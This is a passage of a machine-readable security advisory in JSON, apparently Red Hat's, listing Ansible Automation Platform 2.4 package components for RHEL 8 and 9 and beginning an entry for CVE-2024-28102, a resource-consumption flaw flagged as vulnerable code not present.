"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch"
},
"product_reference": "automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch"
},
"product_reference": "ansible-core-1:2.15.12-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Inside-1.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src"
},
"product_reference": "ansible-core-1:2.15.12-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Inside-1.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-test-1:2.15.12-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch"
},
"product_reference": "ansible-test-1:2.15.12-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Inside-1.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch"
},
"product_reference": "ansible-core-1:2.15.12-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src"
},
"product_reference": "ansible-core-1:2.15.12-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-test-1:2.15.12-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch"
},
"product_reference": "ansible-test-1:2.15.12-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.aarch64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.ppc64le",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.s390x",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.x86_64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-cli-0:4.5.8-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch"
},
"product_reference": "automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-server-0:4.5.8-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch"
},
"product_reference": "automation-controller-server-0:4.5.8-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-ui-0:4.5.8-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch"
},
"product_reference": "automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch"
},
"product_reference": "ansible-core-1:2.15.12-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src"
},
"product_reference": "ansible-core-1:2.15.12-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-test-1:2.15.12-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch"
},
"product_reference": "ansible-test-1:2.15.12-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-cli-0:4.5.8-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch"
},
"product_reference": "automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-server-0:4.5.8-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch"
},
"product_reference": "automation-controller-server-0:4.5.8-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-ui-0:4.5.8-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch"
},
"product_reference": "automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch"
},
"product_reference": "ansible-core-1:2.15.12-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Inside-1.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src"
},
"product_reference": "ansible-core-1:2.15.12-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Inside-1.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-test-1:2.15.12-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch"
},
"product_reference": "ansible-test-1:2.15.12-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Inside-1.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch"
},
"product_reference": "ansible-core-1:2.15.12-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src"
},
"product_reference": "ansible-core-1:2.15.12-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-test-1:2.15.12-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch"
},
"product_reference": "ansible-test-1:2.15.12-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-cli-0:4.5.8-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch"
},
"product_reference": "automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-server-0:4.5.8-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch"
},
"product_reference": "automation-controller-server-0:4.5.8-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-ui-0:4.5.8-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch"
},
"product_reference": "automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-28102",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2024-03-10T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
